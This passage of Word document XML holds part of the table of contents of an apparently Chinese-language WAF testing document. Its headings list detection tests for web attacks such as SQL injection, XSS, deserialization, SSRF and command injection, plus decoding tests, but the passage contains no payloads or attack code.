          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>3 网络拓扑</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1021245348 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>7</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="3D98E30C">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_Toc1381257012 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">4 </w:t>
          </w:r>
          <w:r>
            <w:t>WAF</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>攻击检测功</w:t>
          </w:r>
          <w:r>
            <w:t>能</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1381257012 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>8</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="4331E413">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_Toc488376614 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:eastAsia="Arial" w:cs="Arial"/>
            </w:rPr>
            <w:t xml:space="preserve">4.1 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>W</w:t>
          </w:r>
          <w:r>
            <w:t>EB攻击</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>检测测试</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc488376614 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>8</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="2BC958E7">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_Toc463252664 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1.1 SQL注入攻击</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc463252664 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>8</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="61623D36">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_Toc1259303473 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">4.1.2 </w:t>
          </w:r>
          <w:r>
            <w:t>XSS攻击</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1259303473 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>8</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="7654706C">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_Toc1662129526 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1.3 Java</w:t>
          </w:r>
          <w:r>
            <w:t>反序列化攻击</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1662129526 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>9</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="2D32C3CC">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_Toc943663306 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1.4 文件上传攻击</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc943663306 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>9</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="3C59A994">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_Toc982450847 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1.5 文件包含攻击</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc982450847 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>10</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="2331814A">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_Toc49623746 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">4.1.6 </w:t>
          </w:r>
          <w:r>
            <w:t>PHP代码注入攻击</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc49623746 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>10</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="4C16C4A4">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_Toc802643986 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1.7 CSRF</w:t>
          </w:r>
          <w:r>
            <w:t>攻击</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc802643986 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>12</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="0CC67C8D">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_Toc1692685895 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1.8 SSRF</w:t>
          </w:r>
          <w:r>
            <w:t>攻击</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1692685895 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>12</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="5938C24C">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_Toc1255965456 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">4.1.9 </w:t>
          </w:r>
          <w:r>
            <w:t>PHP</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>反序列化</w:t>
          </w:r>
          <w:r>
            <w:t>攻击</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1255965456 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>13</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="1093BDE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_Toc1394652629 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1.10 ASP</w:t>
          </w:r>
          <w:r>
            <w:t>代码注入攻击</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1394652629 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>13</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="478F7ADA">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_Toc142728598 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1.11 JAVA</w:t>
          </w:r>
          <w:r>
            <w:t>代码注入攻击</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc142728598 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>14</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="3E6F0C9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_Toc100312887 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1.12 命令</w:t>
          </w:r>
          <w:r>
            <w:t>注入攻击</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc100312887 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>15</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="2542E05C">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_Toc184028914 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1.13 情报模块</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc184028914 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>15</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="32ABE643">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_Toc597505918 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1.14 服务器响应检测模块</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc597505918 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>16</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="59CA2B7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_Toc648430454 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1.15 机器人检测模块</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc648430454 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>16</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="365B8E44">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_Toc1838615500 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:eastAsia="Arial" w:cs="Arial"/>
            </w:rPr>
            <w:t xml:space="preserve">4.2 </w:t>
          </w:r>
          <w:r>
            <w:t>常用编码解码</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>测试</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1838615500 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>17</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="1B0FF5D7">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_Toc1468511817 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">4.2.1 </w:t>
          </w:r>
          <w:r>
            <w:t>BASE64解码</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1468511817 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>17</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="0FF86B71">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_Toc248553348 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">4.2.2 </w:t>
          </w:r>
          <w:r>
            <w:t>URL解码</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc248553348 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>17</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="1FC4F795">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_Toc580426421 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.2.3 JSON</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> 解</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>析</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc580426421 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>18</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="40F973A6">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_Toc1356133073 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.2.4 十六进制转换</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1356133073 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>18</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="47004107">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_Toc1284612300 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.2.5 斜杠反转义</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1284612300 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>19</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="2E0A80DB">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_Toc1825822809 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
